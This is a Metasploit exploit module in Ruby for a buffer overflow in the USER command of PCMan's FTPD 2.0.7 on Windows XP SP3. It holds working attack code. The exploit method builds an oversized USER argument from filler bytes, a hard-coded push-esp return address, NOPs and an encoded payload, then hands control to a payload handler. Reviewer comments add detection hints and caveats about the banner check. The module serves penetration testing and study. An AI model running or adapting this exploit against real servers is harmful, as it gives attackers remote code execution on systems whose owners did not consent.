# Exploit-DB Note: Ret needs adjustment for Windows XP SP3 English
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
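require 'msf/core'

# Metasploit remote module for a buffer overflow in the USER command of
# PCMan's FTPD (the module title names V2.0.7).
#
# Review notes:
# - The single target hard-codes a return address for Windows XP SP3 English,
#   so the module relies on a `push esp, ret` sequence sitting at a fixed,
#   predictable address. Hosts where module addresses are randomized or the
#   stack is non-executable do not satisfy that assumption.
# - The request is one FTP USER command sent straight after connecting, with
#   an argument of more than 2000 bytes. Usernames are never that long, so an
#   oversized USER argument is a practical signal for network detection and
#   for FTP server log review.
# - #check only inspects the greeting banner; see the comment there.
class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp

  # Registers the module metadata (name, author, payload constraints and the
  # single target) with the framework.
  #
  # @param info [Hash] metadata supplied by the framework or a subclass; it is
  #   merged with the values below through update_info.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'PCMan\'s FTPD V2.0.7 Username Overflow',
      # The description text is kept exactly as in the original listing.
      'Description' => %q{
This module exploits a buffer overflow found in the USER command
of PCMan's FTPD.},
      'Author' => 'MSJ <matt.jones.85[at]gmail.com>',
      'License' => MSF_LICENSE,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Payload' =>
        {
          'Space' => 2005,
          # NOTE(review): these four bytes are the little-endian bytes of the
          # Ret value below (0x7e429353). Whether that is the intended
          # bad-character set cannot be told from this file -- confirm.
          'BadChars' => "\x53\x93\x42\x7E",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          # Target 0
          [
            'Windows XP SP3 English',
            {
              'Ret' => 0x7e429353 # push esp, ret
            }
          ]
        ],
      'Default Target' => 0))
  end

  # Banner-based check: connects, disconnects, then matches the FTP greeting.
  #
  # A greeting match is passive evidence only. The overflow is never
  # exercised, and the matched banner text says "2.0" with no patch level, so
  # it cannot distinguish 2.0.7 from other 2.0 builds. The result is therefore
  # reported as Appears rather than Vulnerable, which keeps assessment output
  # from overstating confidence. A server with a customised banner will be
  # reported Safe even if it runs the affected build.
  #
  # @return [Exploit::CheckCode] Appears when the greeting matches, else Safe.
  def check
    connect
    disconnect

    if banner =~ /220 PCMan\'s FTP Server 2\.0 Ready\./
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  # Sends the single oversized USER command and hands off to the payload
  # handler.
  #
  # Layout of the command argument, as built below: 2005 filler bytes, the
  # target's 4-byte return address packed little-endian ('V'), 16 NOP bytes,
  # then the encoded payload.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    sploit = 'USER ' + "\x41" * 2005 + [target.ret].pack('V') + make_nops(16) + payload.encoded

    # Second argument false: presumably "do not wait for a server reply" --
    # confirm against the Ftp mixin's send_cmd signature.
    send_cmd([sploit], false)

    handler
    disconnect
  end
end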